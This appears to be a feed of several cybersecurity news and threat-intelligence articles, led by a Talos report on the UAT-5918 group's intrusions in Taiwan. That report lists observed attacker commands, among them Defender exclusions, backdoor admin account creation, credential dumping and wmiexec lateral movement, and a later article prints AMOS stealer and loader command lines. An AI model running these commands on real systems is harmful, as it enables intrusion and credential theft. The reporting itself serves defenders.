UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim environments for information theft and credential harvesting.

By Jung soo An, Asheer Malhotra, Brandon White, and Vitor Ventura.

*   Cisco Talos discovered a malicious campaign we track under the UAT-5918 umbrella that has been active since at least 2023. 
*   UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim environments for information theft and credential harvesting. 
*   We assess that UAT-5918's post-compromise activity, tactics, techniques, and procedures (TTPs), and victimology overlaps the most with Volt Typhoon, Flax Typhoon, Earth Estries, and Dalbit intrusions we’ve observed in the past.

**UAT-5918’s activity cluster****Overview **

Talos assesses with high confidence that UAT-5918 is an advanced persistent threat (APT) group that targets entities in Taiwan to establish long-term persistent access in victim environments. UAT-5918 usually obtains initial access by exploiting N-day vulnerabilities in unpatched web and application servers exposed to the internet. The threat actor will subsequently use a plethora of open-source tools for network reconnaissance to move through the compromised enterprise. 

The activity that we monitored suggests that the post-compromise activity is done manually with the main goal being information theft. Evidently, it also includes deployment of web shells across any discovered sub-domains and internet-accessible servers to open multiple points of entry to the victim organizations. UAT-5918's intrusions harvest credentials to obtain local and domain level user credentials and the creation of new administrative user accounts to facilitate additional channels of access, such as RDP to endpoints of significance to the threat actor.

Typical tooling used by UAT-5918 includes networking tools such as FRPC, FScan, In-Swor, Earthworm, and Neo-reGeorg. Credential harvesting is accomplished by dumping registry hives, NTDS, and using tools such as Mimikatz and browser credential extractors. These credentials are then used to perform lateral movement via either RDP, WMIC (PowerShell remoting), or Impacket. 

**UAT-5918 activity cluster overlapping **

UAT-5918's tooling and TTPs overlap substantially with several APT groups including Volt Typhoon, Flax Typhoon and Dalbit. 

Figure 1. UAT-5918 TTPs and tooling overlaps with similar APT groups.

There is a significant overlap in post-compromise tooling and TTPs with Volt Typhoon, such as using ping and tools like In-Swor for network discovery; gathering system information such as drive and partition; gathering logical drive information such as names, IDs, size, and free spaces; credential dumping from web browser applications; using open-source tools such as frp, Earthworm, and Impacket for establishing control channels; and the absence of custom-made malware. The U.S. government assesses that Volt Typhoon is a PRC state-sponsored actor conducting cyberattacks against U.S. critical infrastructure. 

Multiple tools used in this intrusion also overlap with tooling used by Flax Typhoon in the past, such as the Chopper web shell, Mimikatz, JuicyPotato, Metasploit, WMIC and PowerShell, along with the use of tactics such as relying on RDP and other web shells to persist in the enterprise and WMIC for gathering system information. The U.S. government attributes Flax Typhoon, a Chinese government-sponsored threat actor, to the Integrity Technology Group, a PRC-based company.

Additionally, tooling such as FRP, FScan, In-Swor, and Neo-reGeorg, as well as filepaths and names used by UAT-5918, overlap with those used by Tropic Trooper. Tropic Trooper’s malware suite, specifically Crowdoor Loader and SparrowDoor, overlap with the threat actors known as Famous Sparrow and Earth Estries. We have also observed overlaps in tooling and tactics used in this campaign operated by UAT-5918 and in operations conducted by Earth Estries, including the use of FRP, FScan, Webshells, Impacket, living-off-the-land binaries (LoLBins), etc. Furthermore, we’ve discovered similar tooling between UAT-5918 and Dalbit consisting of port scanners, proxying tools, reverse shells, and reconnaissance TTPs.

It is worth noting that a sub-set of tools UAT-5918 uses such as LaZagne, SNetCracker, PortBrute, NetSpy etc., have not been seen being used by the aforementioned threat actors in public reporting. It is highly likely that this tooling might be exclusively used by UAT-5918 or their usage by other related groups may have been omitted in publicly available disclosures. 

**Victimology and targeted verticals **

UAT-5918 also overlaps with the previously mentioned APT groups in terms of targeted geographies and industry verticals, indicating that this threat actor’s operations align with the strategic goals of the aforementioned set of threat actors. 

We have primarily observed targeting of entities in Taiwan by UAT-5918 in industry verticals such as telecommunications, healthcare, information technology, and other critical infrastructure sectors. Similar verticals and geographies have also been targeted by APT groups such as Volt Typhoon, Flax Typhoon, Earth Estries, Tropic Trooper, and Dalbit. 

**Initial access and reconnaissance **

UAT-5918 typically gains initial access to their victims via exploitation of known vulnerabilities on unpatched servers exposed to the internet. Activity following a successful compromise consists of preliminary reconnaissance to identify users, domains, and gather system information. Typical commands executed on endpoints include: 

ping <IP> 
net user 
systeminfo 
arp –a 
route print 
tasklist 
tasklist -v 
netstat -ano 
whoami 
ipconfig 
query user 
cmd /c dir c:\\users\\<username>\\Desktop 
cmd /c dir c:\\users\\<username>\\Documents 
cmd /c dir c:\\users\\<username>\\Downloads 

 Initial credential reconnaissance is carried out using the cmdkey command: 

cmdkey /list 

The threat actor then proceeds to download and place publicly available red-teaming tools (illustrated in subsequent sections) on endpoints to carry out further actions. In some cases, UAT-5918 also disabled Microsoft Defender’s scanning of their working directories on disk: 

powershell.exe -exec bypass Add-MpPreference -ExclusionPath <working\_directory> 
powershell Get-MpPreference 

**Post-compromise tooling **

UAT-5918's post-compromise tooling consists of web shells, some of which are publicly available, such as the Chopper web shell, multiple red-teaming and network scanning tools, and credentials harvesters.

**Reverse proxies and tunnels **

The actor uses FRP and Neo-reGeorge to establish reverse proxy tunnels for accessing compromised endpoints via attacker controlled remote hosts. The tools are usually downloaded as archives and extracted before execution:

The Earthworm (ew) tool for establishing proxies is also run: 

**Port scanning **

FScan is a port and vulnerability scanning tool that can scan ranges of IP addresses and Ports specified by the attackers:

Talos has observed the actor scanning of these ports in particular: 

 21 22 80 81 83 91 135 443 445 888 808 889 5432 8000 8080 54577 11211

The threat actor also relies extensively on the use of In-Swor, a publicly available tool authored and documented by Chinese speaking individuals, for conducting port scans across ranges of IP addresses. A sample command of In-Swor's use is: 

Run\[.\]exe -h <ip\_range>/24 -nopoc -pwdf pw\[.\]txt -p 1521,6379 -t 4 

In-Swor was used to scan for the following ports across IP address ranges: 

22		SSH 
80		HTTP 
135		RPC 
445		SMB 
1433		SQL server 
1521		Oracle DBs 
3306		MySQL 
3389		RDP 
4194 		Kubernetes? 
5432 		PostgreSQL 
5900 		VNC 
6379 		Redis 
10248 	    ? 
10250 	    Kubernetes 
10255 	    MongoDB 

In other instances, In-Swor was used to establish proxy channels:

svchost\[.\]exe proxy -l \*:22 -k 9999   
svchost\[.\]exe proxy -l \*:443 -k 9999   
svchost\[.\]exe proxy -hc -l \*:443 -k 99997654    
svchost\[.\]exe -hc proxy -l \*:443 -k 99997654    
svchost\[.\]exe proxy -l 443 –v 

 svchost\[.\]exe -type server -proto tcp -listen :443    
svchost\[.\]exe -type server -proto http -listen :443    
svchost\[.\]exe -type server -proto rhttp -listen :443 

In addition to FScan, PortBrute, another password brute forcer for multiple protocols such as FTP, SSH, SMB, MYSQL, MONGODB, etc., was also downloaded and used:

PortBruteWin(5).exe -up <username>:<password> 

**Additional network reconnaissance **

The threat actor uses two utilities for monitoring the current connection to the compromised hosts — NirSoft's CurrPorts utility and TCPView. Both tools are likely used to perform additional network discovery to find accessible hosts to pivot to: 

C:\\Users\\<compromised\_user>\\Desktop\\cports-x64/cports.exe   
C:\\Users\\<compromised\_user>\\Desktop\\TCPView\\tcpview64.exe 

The threat actor also uses PowerShell-based scripts to attempt SMB logins to specific endpoints already identified by them:

powershell\[.\]exe -file C:\\ProgramData\\smblogin-extra-mini.ps1 

Netspy, another tool authored and documented by Chinese speaking individuals, is a network segmentation discovery tool that UAT-5918 employs occasionally for discovery. The fact that the operator had to check the tool help denotes the lack of automation and the unusual usage of such tool:

netspy\[.\]exe -h 

**Gathering local system information **

The attackers may also gather commands to profile the endpoint and its drives:

wmic diskdrive get partitions /value    
fsutil fsinfo drives    
wmic logicaldisk get DeviceID,VolumeName,Size,FreeSpace    
wmic logicaldisk get DeviceID,VolumeName,Size,FreeSpace /format:value 

**Maintaining persistent access to victims **

The threat actor attempts to deploy multiple web shells on systems they find are hosting web applications. The web shells are typically ASP or PHP-based files placed deep inside housekeeping directories such as image directories, user files etc. 

The threat actor uses JuicyPotato’s (a privilege escalation tool) web shell variant that allows JuicyPotato to act as a web shell on the compromised system accepting commands from remote systems to execute:

JuicyPotato is then run to spawn cmd\[.\]exe to run a reverse shell that allows the threat actor to run arbitrary commands: 

Run.exe -t t -p c:\\windows\\system32\\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 

UAT-5918 will also use PuTTY’s pscp tool to connect to and deliver additional web shells to accessible endpoints (likely servers) within the network:

pscp\[.\]exe <web\_shell> <user>@<IP>:/var/www/html/<web\_shell> 

Furthermore, Talos has observed UAT-5918 execute reverse Meterpreter shells to maintain persistent access to the compromised hosts:

C:\\ProgramData\\bind.exe 

C:\\ProgramData\\microbind.exe 

C:\\ProgramData\\reverse.exe 

cmd /c C:/ProgramData/microbind.exe 

**Backdoored user account creation **

UAT-5918 regularly creates and assigns administrative privileges to user accounts they’ve created on compromised endpoints: 

net user <victimname\_username> <password> /add   
net localgroup administrators <username> /add   
net group domain admins <username> /add /domain 

Credential harvesting is a key tactic in UAT-5918 intrusions, instrumented via the use of tools such as Mimikatz, LaZagne, and browser credential stealers: 

**Mimikatz**: A commonly used credential extractor tool is run to obtain credentials from the endpoint:

**LaZagne**: LaZagne is an open-sourced credential extractor: 

C:/ProgramData/LaZagne.exe   
C:/ProgramData/LaZagne.exe -all >> laz.txt 

**Registry dumps**: The “reg” system command is used to take dumps of the SAM, SECURITY and SYSTEM hives:

**Google Chrome information**: The adversary also uses a tool called BrowserDataLite, a tool to extract Login information, cookies, and browsing history from web browsers. The extracted information is subsequently accessed via notepad\[.\]exe: 

BrowserDataLite\_x64.exe 

 C:\\Windows\\system32\\NOTEPAD.EXE Chrome\_LoginPass.txt   
C:\\Windows\\system32\\NOTEPAD.EXE Chrome\_Cookies.txt   
C:\\Windows\\system32\\NOTEPAD.EXE Chrome\_History.txt 

**SNETCracker**: A .NET-based password cracker (brute forcer) for services such as SSH, RDP, FTP, MySQL, SMPT, Telnet, VNC, etc.: 

Finding strings related to credentials such as: 

findstr /s /i /n /d:C:\\ password \*.conf 

**Pivoting to additional endpoints **

UAT-5918 consistently attempts to gain access to additional endpoints within the enterprise. They will perform network reconnaissance cyclically to discover new endpoints worth pivoting to and make attempts to gain access via RDP or Impacket: 

mstsc.exe -v <hostname> 

Impacket was also used on multiple occasions to pivot into additional endpoints and copy over tools: 

python wmiexec\[.\]py Administrator:<password>@<IP> -codec big5 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\ADMIN$\\\_\_<timestamp> 2>&1 

 cmd\[.\]exe /Q /c echo python wmiexec\[.\]py Administrator:<password>@<IP> -codec big5 ^> \\\\<hostname>\\C$\\\_\_output 2^>^&1 > C:\\Windows\\jFcZpIUm\[.\]bat & C:\\Windows\\system32\\cmd\[.\]exe /Q /c C:\\Windows\\jFcZpIUm\[.\]bat & del C:\\Windows\\jFcZpIUm\[.\]bat 

 cmd\[.\]exe /Q /c net use \[\\\]\[\\\]<IP>\\c$ /user:<username> 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\<share>\_\_ 2>&1   
cmd\[.\]exe /Q /c dir \[\\\]\\\[\\\]<IP>\\c$ 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\<share>\_\_ 2>&1    
cmd\[.\]exe /Q /c copy fscan64\[.\]exe \[\\\]\[\\\]<IP>\\c$\\ 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\<share>\_\_ 2>&1    
cmd\[.\]exe /Q /c copy \[\\\]\[\\\]<IP>\\c$\\<scan\_result>.txt 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\<share>\_\_ 2>&1    
cmd\[.\]exe /Q /c copy fscan\[.\]exe \[\\\]\[\\\]<IP>\\c$\\ 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\<share>\_\_ 2>&1    
cmd\[.\]exe /Q /c copy mimikatz\[.\]exe \[\\\]\[\\\]<IP>\\c$ 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\<share>\_\_ 2>&1 

**File collection and staging **

UAT-5918 pivots across endpoints enumerating local and shared drives to find data of interest to the threat actor. This data may include everything that furthers the APT’s strategic and tactical goals and ranges from confidential documents, DB exports and backups to application configuration files. In one instance, the threat actor used the SQLCMD\[.\]exe utility to create a database backup that could be exfiltrated: 

C:/ProgramData/SQLCMD.EXE -S <target\_server\_DB> -U <username> -P <password> -Q BACKUP DATABASE <NAME> to disk='<db\_backup\_location>.bak' 

**Coverage **

Ways our customers can detect and block this threat are listed below. 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCs **

IOCs for this research can also be found at our GitHub repository here. 

6F6F7AA6144A1CFE61AC0A80DB7AD712440BDC5730644E05794876EB8B6A41B4 
BAB01D029556CF6290F6F21FEC5932E13399F93C5FDBCFFD3831006745F0EB83 
F7F6D0AFB300B57C32853D49FF50650F5D1DC7CF8111AA32FF658783C038BFE5 
497A326C6C207C1FB49E4DAD81D051FCF6BCBE047E0D3FE757C298EF8FE99ABA 
F9EB34C34E4A91630F265F12569F70B83FEBA039C861D6BF906B74E7FB308648 
DD832C8E30ED50383495D370836688EE48E95334270CBBCE41109594CB0C9FD1 
F7B52EE613F8D4E55A69F0B93AA9AA5472E453B0C458C8390DB963FF8B0B769C 
B994CBC1B5C905A2B731E47B30718C684521E8EC6AFB601AFECF30EF573E5153 
12D4EFE2B21B5053A3A21B49F25A6A4797DC6E9A80D511F29CA67039BA361F63 
2272925B1E83C7C3AB24BDEB82CE727DB84F5268C70744345CDA41B452C49E84 
71EB5115E8C47FFF1AB0E7ACEBAEA7780223683259A2BB1B8DB1EB3F26878CA4 
E159824448A8E53425B38BD11030AA786C460F956C9D7FC118B212E8CED4087A 
7EF22BFB6B2B2D23FE026BDFD7D2304427B6B62C6F9643EFEDDB4820EBF865AF 
EFC0D2C1E05E106C5C36160E17619A494676DEB136FB877C6D26F3ADF75A5777 
B7690c0fc9ec32e1a54663a2e5581e6260fe9318a565a475ee8a56c0638f38d0 
A774244ea5d759c4044aea75128a977e45fd6d1bb5942d9a8a1c5d7bff7e3db9 
31742ab79932af3649189b9287730384215a8dccdf21db50de320da7b3e16bb4 
09cea8aed5c58c446e6ef4d9bb83f7b5d7ba7b7c89d4164f397d378832722b69 
D47e35baee57eb692065a2295e3e9de40e4c57dba72cb39f9acb9f564c33b421 
1753fa34babeeee3b20093b72987b7f5e257270f86787c81a556790cb322c747 
F4ea99dc41cb7922d01955eef9303ec3a24b88c3318138855346de1e830ed09e 
5b0f8c650f54f17d002c01dcc74713a40eccb0367357d3f86490e9d17fcd71e8 
3588bda890ebf6138a82ae2e4f3cd7234ec071f343c9f5db5a96a54734eeaf9f 
95eee44482b4226efe3739bed3fa6ce7ae7db407c1e82e988f27cd27a31b56a6 
02ab315e4e3cf71c1632c91d4914c21b9f6e0b9aa0263f2400d6381aab759a61 
D1825cd7a985307c8585d88d247922c3a51835f9338dc76c10cdbad859900a03 
234899dea0a0e91c67c7172204de3a92a4cbeef37cdc10f563bf78343234ad1d 
8d440c5f0eca705c6d27aa4883c9cc4f8711de30fea32342d44a286b362efa9a 
Ffb8db57b543ba8a5086640a0b59a5def4929ad261e9f3624b2c0a22ae380391

UAT-5918 targets critical infrastructure entities in Taiwan

Microsoft refuses to patch serious Windows shortcut vulnerability abused in global espionage campaigns!

A new Windows zero-day vulnerability is being actively exploited by at least 11 hacking groups linked to nation-states including North Korea, Iran, Russia, and China for years. Despite evidence of widespread attacks dating back to 2017, Microsoft has declined to issue a security patch, labelling the issue as “not meeting the bar for servicing.”

The vulnerability, tracked by Trend Micro as **ZDI-CAN-25373**, allows attackers to execute malicious code on Windows systems by hiding commands within shortcut (.lnk) files. When Trend Micro submitted proof of this vulnerability through their Zero Day Initiative bug bounty program, Microsoft categorized it as low severity and stated they would not address it with an immediate security update. No CVE identifier has been assigned to the flaw.

“We discovered nearly a thousand Shell Link (.lnk) samples that exploit ZDI-CAN-25373; however, it is probable that the total number of exploitation attempts are much higher,” Trend Micro researchers stated in a **blog post** shared with Hackread.com.

****How the Vulnerability Works****

The vulnerability takes advantage of how Windows displays information about shortcut files. When a user right-clicks on a file to view its properties, Windows fails to show hidden malicious commands embedded within the file.

Hackers achieve this by inserting large numbers of blank spaces or other whitespace characters into the command line arguments of the shortcut file. These invisible characters effectively push the malicious commands beyond what’s visible in the Windows interface, making the file appear harmless to users.

What’s even more concerning, some North Korean threat actors including **Earth Manticore** (APT37) and **Earth Imp** (Konni), have created “extremely large” shortcut files, reaching sizes up to 70MB, to further complicate detection. This technique has proven effective enough that various state-backed hacking groups have exploited it in their attack methods for years.

The security firm’s analysis found that nearly half of the state-sponsored attackers exploiting this vulnerability originate from North Korea, with the remaining groups linked to Iran, Russia, and China. Approximately 70% of these campaigns focused on espionage and information theft, while over 20% aimed at financial gain.

According to researchers, organizations in various sectors are at high risk, including:

*   Government
*   Energy companies
*   Financial institutions
*   Military and defence
*   Telecommunications providers.

While most victims were detected in North America, researchers noted attacks across Europe, Asia, South America, and Australia. On the other hand, industry leaders are criticizing Microsoft for not addressing such a serious vulnerability.

**Thomas Richards**, Principal Consultant, Network and Red Team Practice Director at Black Duck, a Burlington, Massachusetts-based provider of application security solutions expressed surprise at Microsoft’s decision.

“Actively exploited vulnerabilities are usually patched within a short period. It’s unusual for Microsoft to refuse to release a security patch in this situation given that it is actively being exploited by nation-state groups,” said Thomas. “Microsoft should address the vulnerability immediately to manage software risk and prevent further attacks and compromises of systems throughout the world.”

**Jason Soroko**, Senior Fellow at Sectigo, a Scottsdale, Arizona-based provider of comprehensive certificate lifecycle management (CLM), is not surprised by Microsoft’s decision.

“Exploiting the vulnerability involves manipulating how Windows displays shortcut files by padding command-line arguments with whitespace characters and if this method requires a chain of specific conditions or user interactions that are unlikely in everyday scenarios, Microsoft may view it as lower risk,” Jason explained. “If the ability to do this requires the attacker to elevate privileges using an endpoint compromise, I have seen Microsoft in the past express a similar viewpoint.”

****ZDI and Microsoft: A History of Cybersecurity Disputes****

This is not the first time ZDI has criticized Microsoft over a security vulnerability issue. In July 2024, ZDI **accused** Microsoft of failing to credit them in its Patch Tuesday update and criticized its lack of transparency in vulnerability disclosure.

Another researcher, Haifei Li of Check Point, who independently discovered the same vulnerability, also went unacknowledged, further highlighting the lack of communication from Microsoft.

Nevertheless, the fact that Microsoft has chosen not to issue a patch for this flaw leaves millions of users exposed to cybersecurity threats and puts organizations at risk as nation-state hackers continue to exploit it. Therefore, to stay protected, use a strong EDR solution to detect and block malicious .lnk files. Monitor network traffic for signs of compromise, train users to avoid suspicious links, and stay updated on security alerts.

11 Nation-State Hackers Exploit Unpatched Windows Flaw Since 2017

About Spoofing – Windows File Explorer (CVE-2025-24071) vulnerability. The vulnerability is from the March Microsoft Patch Tuesday. The VM vendors didn’t highlight it in their reviews. A week later, on March 18, researcher 0x6rss published a write-up and a PoC exploit. According to him, the vulnerability is exploited in the wild, and the exploit has […]

**About Spoofing – Windows File Explorer (CVE-2025-24071) vulnerability.** The vulnerability is from the March Microsoft Patch Tuesday. The VM vendors didn’t highlight it in their reviews. A week later, on March 18, researcher 0x6rss published a write-up and a PoC exploit. According to him, the vulnerability is exploited in the wild, and the exploit has likely been available for purchase since November 2024.

The point is this. When Windows File Explorer detects a .library-ms file in a folder, it automatically starts parsing it. If the file contains a link to a remote SMB share, an NTLM authentication handshake begins. An attacker controlling the SMB share can intercept the NTLMv2 hash, crack it, or use it in pass-the-hash attacks.

But how does an attacker deliver such a file to the victim? It turns out that just **extracting a ZIP/RAR archive** with the file is enough to trigger the exploit. No need to open the file.

This is super effective for phishing. 😱

На русском

Hi! My name is Alexander and I am a Vulnerability Management specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

А всех русскоязычных я приглашаю в ещё один телеграмм канал @avleonovrus, первым делом теперь пишу туда.

About Spoofing – Windows File Explorer (CVE-2025-24071) vulnerability

Threat actors are exploiting a severe security flaw in PHP to deliver cryptocurrency miners and remote access trojans (RATs) like Quasar RAT.
The vulnerability, assigned the CVE identifier CVE-2024-4577, refers to an argument injection vulnerability in PHP affecting Windows-based systems running in CGI mode that could allow remote attackers to run arbitrary code.
Cybersecurity company

Hackers Exploit Severe PHP Flaw to Deploy Quasar RAT and XMRig Miners

Hackers are using .VHD files to spread VenomRAT malware, bypassing security software, reveals Forcepoint X-Labs. Learn how this stealthy attack works and how to protect yourself.

Cybersecurity researchers at Forcepoint X-Labs have spotted a new and tricky malware campaign that has been spreading and infecting targeted devices with VenomRAT, a remote access trojan known for targeting researchers in fake PoC (Proof of Concept) attacks

In this campaign, instead of the usually infected documents or executable files, cybercriminals are delivering the dangerous VenomRAT hidden inside a virtual hard disk image file (.vhd).

The campaign begins with a phishing email. This time, the bait is an apparently harmless purchase order. However, opening the attached archive doesn’t reveal a typical document. Instead, users find a .vhd file – a container that mimics a physical hard drive.

When a user opens the .vhd file, their computer treats it like a new drive. But this isn’t a drive full of legitimate files; it contains a malicious batch script designed to cause harm. Using a .vhd file to spread malware is a new trick. Since these files are commonly used for disk imaging and virtualization, security software doesn’t always flag them as a threat.

“This is a unique approach,” explains Prashant Kumar, a Security Researcher at Forcepoint X-Labs. “Attackers are constantly looking for ways to evade detection, and hiding malware within a virtual hard disk image is a good example of that.”

****The Attack and Stealing User Data****

According to research from Forcepoint X-Labs, shared with Hackread.com, the malware script is disguised with multiple layers of code and executes a series of malicious activities once activated. It starts by self-replicating, making sure a copy remains available at all times.

Then, it launches PowerShell, a legitimate Windows tool often exploited by attackers, and establishes persistence by placing a malicious script in the Startup folder, allowing it to run automatically whenever the user logs in. To dig in even more, the script modifies Windows registry settings, making it harder to detect and remove.

The malware also employs hidden communication by connecting to Pastebin, a popular text-sharing platform, to fetch instructions from a remote command-and-control (C2) server, which serves as the attacker’s command hub. Once established, the malware initiates data theft, logging keystrokes and storing sensitive information in a configuration file. It also downloads additional components, including a .NET executable, to assist in encryption and system manipulation.

Researchers noted that this VenomRAT variant uses HVNC (Hidden Virtual Network Computing), a remote control service that allows attackers to control the infected system without detection.

Phishing email and attack vector used in the campaign (Screenshots via Forcepoint X-Labs)

****What’s Next for Unsuspected Users?****

Be careful with email attachments, even if they seem legitimate; especially if they come from unknown senders. If you receive an unexpected invoice or purchase order, don’t trust the contact details in the email; verify it directly with the sender using a known phone number or email.

Keeping your operating system, antivirus, and security tools up to date is critical for blocking threats from executing on your system. Lastly, make sure your team knows how to spot and report phishing attempts. Awareness and common sense are two of the best cybersecurity measures anyone can use, anywhere and at all times.

Hackers Hide VenomRAT Malware Inside Virtual Hard Disk Image File

Top 10 Passwords hackers use to breach RDP revealed! Weak credentials cause successful cyberattacks- check if yours is on the list and secure your system now.

A recent study by the Specops research team reveals that hackers continue to exploit weak passwords in attacks on Remote Desktop Protocol (RDP) ports. This report also adds over 85 million compromised passwords to Specops’ Breached Password Protection service, sourced from their honeypot network and threat intelligence.

****What is RDP and Why Attack RDP Ports?****

RDP is a Microsoft-developed protocol that allows users to connect to and control another computer over a network remotely. RDP ports are network ports used by the Remote Desktop Protocol to establish a connection between a client and a remote server or computer. By default, RDP uses port 3389 (TCP/UDP) for communication.

RDP ports are a common target for hackers because they’re widely used for remote access in businesses. Whether it’s for remote work, system maintenance, or troubleshooting, these ports provide an easy entry point, making them a favourite for brute force and password-spraying attacks. It’s not uncommon to see countless failed login attempts from hackers trying to breach.

****Key Findings from the Research****

According to Specops’ research shared with Hackread.com ahead of publishing on Tuesday, March 18, 2025, here’s what they discovered:

**Common Passwords in Use:** The analysis determined that the most frequently attempted password was “123456,” followed by other basic choices such as “1234,” “Password1,” and even “P@ssw0rd.” A notable observation is the recurring use of “Welcome1,” pointing to the danger of temporary passwords assigned during employee onboarding that might never be updated.

**Simple Number Combinations Dominate:** Nearly 25% of the passwords used in these attacks consist solely of numbers. The study highlights that a notable portion of attempts, almost half, rely on either numbers or all lower-case letters.

**Password Length and Complexity:** Eight-character passwords are the most common, likely because many organizations set that length as the minimum requirement. Only about 1.35% of the attacked passwords exceeded 12 characters, indicating that longer passphrases could block nearly all of the attack attempts.

**Expanded Breached Password List:** Alongside these insights, Specops has added more than 85 million compromised passwords to its Breached Password Protection service. These figures come from data gathered through honeypot networks and threat intelligence sources, offering fresh insight into what hackers target.

****Top 10 Passwords in RDP Attacks****

The research team analyzed NTLMv2 hashes from their honeypot system, focusing on RDP-specific attacks. They managed to crack around 40% of these hashes, revealing the top ten passwords used in these attacks:

*   **123456** – 355,088 occurrences
*   **1234** – 309,812 occurrences
*   **Password1** – 271,381 occurrences
*   **12345** – 259,222 occurrences
*   **P@ssw0rd** – 254,065 occurrences
*   **password** – 138,761 occurrences
*   **Password123** – 121,998 occurrences
*   **Welcome1** – 113,820 occurrences
*   **12345678** – 86,682 occurrences
*   **Aa123456** – 69,058 occurrences

****How to Protect Your RDP Ports****

To protect your RDP ports from attacks, start by enabling Multi-Factor Authentication (MFA) so that even if a password is stolen, unauthorized access is blocked. Keeping your Windows servers and clients updated is crucial to patch security vulnerabilities that hackers exploit.

Additionally, ensure TCP port 3389 is secured with SSL encryption and not directly exposed to the internet. Another important step is to restrict RDP access to a specific range of trusted IP addresses, preventing unauthorized users from attempting to connect.

****Simple Password = Security Disaster****

The Specops report makes it clear that relying on simple passwords is a risk organizations can no longer afford. By switching to longer and more complex passwords companies can greatly reduce the impact of today’s RDP attacks.

Top/Featured Image by kalhh from Pixabay

Top 10 Passwords Hackers Use to Breach RDP – Is Yours at Risk?

Reddit users from trading and crypto subreddits are being lured into installing malware disguised as premium cracked software.

We were alerted to Mac and Windows stealers currently distributed via Reddit posts targeting users engaging in cryptocurrency trading. One of the common lures is a cracked software version of the popular trading platform TradingView.

The crooks are posting links to both Windows and Mac installers which have been laced with Lumma Stealer and Atomic Stealer (AMOS) respectively.

These two malware families have wreaked havoc, pillaging victims’ personal data and enabling their distributors to make substantial gains, mostly by taking over cryptocurrency wallets.

**Reddit posts target crypto enthusiasts**

Scammers are lurking on subreddits visited by cryptocurrency traders and posting about free access to TradingView, a web-based platform and social network that provides charting tools for analyzing financial markets, including stocks, forex, cryptocurrencies, and commodities.

The offer claims that the programs are totally free and have been cracked directly from their official version, unlocking premium features.

While the original post gives a heads-up that you are installing these files at your own risk, further down in the thread we can read comments from the OP such as “_a real virus on a Mac would be wild_“.

We checked both links and noticed that the website hosting the files belongs to a Dubai cleaning company. It’s not totally clear why the scammers didn’t choose a service like Mega or similar, unless they wanted the ability to upload and update their code directly via a server they control.

Upon checking that website, we can see that it leaks its PHP version (7.3.33). It already reached its end of life in December 2021 and no longer receives official security updates, making it prone to exploitation and compromise.

**Double zipped malware**

Both Mac and Windows files are double zipped, with the final zip being password protected. For comparison, a legitimate executable would not need to be distributed in such fashion.

On Mac, the installer is a new variant of AMOS, a popular macOS stealer. In its latest iterations, the malicious code checks for the presence of virtual machines and exits with error code 42 if it detects any.

osascript -e "set memData to do shell script \\"system\_profiler SPMemoryDataType\\"  
if memData contains \\"QEMU\\" or memData contains \\"VMware\\" then  
    do shell script \\"exit 42\\"  
else  
    do shell script \\"exit 0\\"  
end if"

Analysis of the full script shows the function that exfiltrates user data via a POST request to 45.140.13.244, a server hosted in the Seychelles:

On Windows, the payload is loaded via an obfuscated bat file (_Costs.tiff.bat_) that runs a malicious Autoit script (_Sad .com_):

"C:\\Windows\\system32\\cmd.exe" /c expand Costs.tiff Costs.tiff.bat & Costs.tiff.bat

cmd /c copy /b 701617\\Sad.com + Io + Thin + Experiment + Detect + Subsection + Meter + Well + Walls + Substantially + Mcdonald 701617\\Sad.com

The malware command and control server here is _cousidporke\[.\]icu_, registered about a week ago by someone in Russia.

We have heard of victims whose crypto wallets had been emptied, and were subsequently impersonated by the criminals who sent phishing links to their contacts.

**Conclusion**

Cracked software has been prone to containing malware for decades, but clearly the lure of a free lunch is still very appealing. What’s interesting with this particular scheme is how involved the original poster is, going through the thread and being ‘helpful’ to users asking questions or reporting an issue.

Here are some things to look out for and stay safe:

*   instructions to disable security software so the program can run (do not disable the antivirus that’s trying to protect you!)
*   files that are password-protected (this is a common practice to thwart security scanners)
*   files hosted on dubious online platforms

However, it is still easy to fall for these scams, especially if the recommendation came from a friend. Malwarebytes protects from both Mac and Windows payloads.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 AMOS and Lumma stealers actively spread to Reddit users 

An unpatched security flaw impacting Microsoft Windows has been exploited by 11 state-sponsored groups from China, Iran, North Korea, and Russia as part of data theft, espionage, and financially motivated campaigns that date back to 2017.
